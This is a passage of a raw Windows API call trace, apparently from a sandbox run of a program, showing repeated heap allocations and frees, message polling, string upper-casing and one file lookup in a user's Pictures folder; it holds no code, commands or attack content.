HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0254.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0254.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0254.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0254.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0254.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.402] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0254.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.402] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0254.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.403] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.403] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0254.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0254.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.404] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0254.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.408] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0254.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.409] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/-6 V-28Zs1i2mga0e.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b71c20, ftCreationTime.dwHighDateTime=0x1d4d291, ftLastAccessTime.dwLowDateTime=0x8823d4a0, ftLastAccessTime.dwHighDateTime=0x1d4cfca, ftLastWriteTime.dwLowDateTime=0x8823d4a0, ftLastWriteTime.dwHighDateTime=0x1d4cfca, nFileSizeHigh=0x0, nFileSizeLow=0xf4a4, dwReserved0=0xa400047, dwReserved1=0x1c1cc, cFileName="-6 V-28Zs1i2mga0e.png", cAlternateFileName="-6V-28~1.PNG")) returned 0xaa5860 [0254.410] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0254.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.411] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.413] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 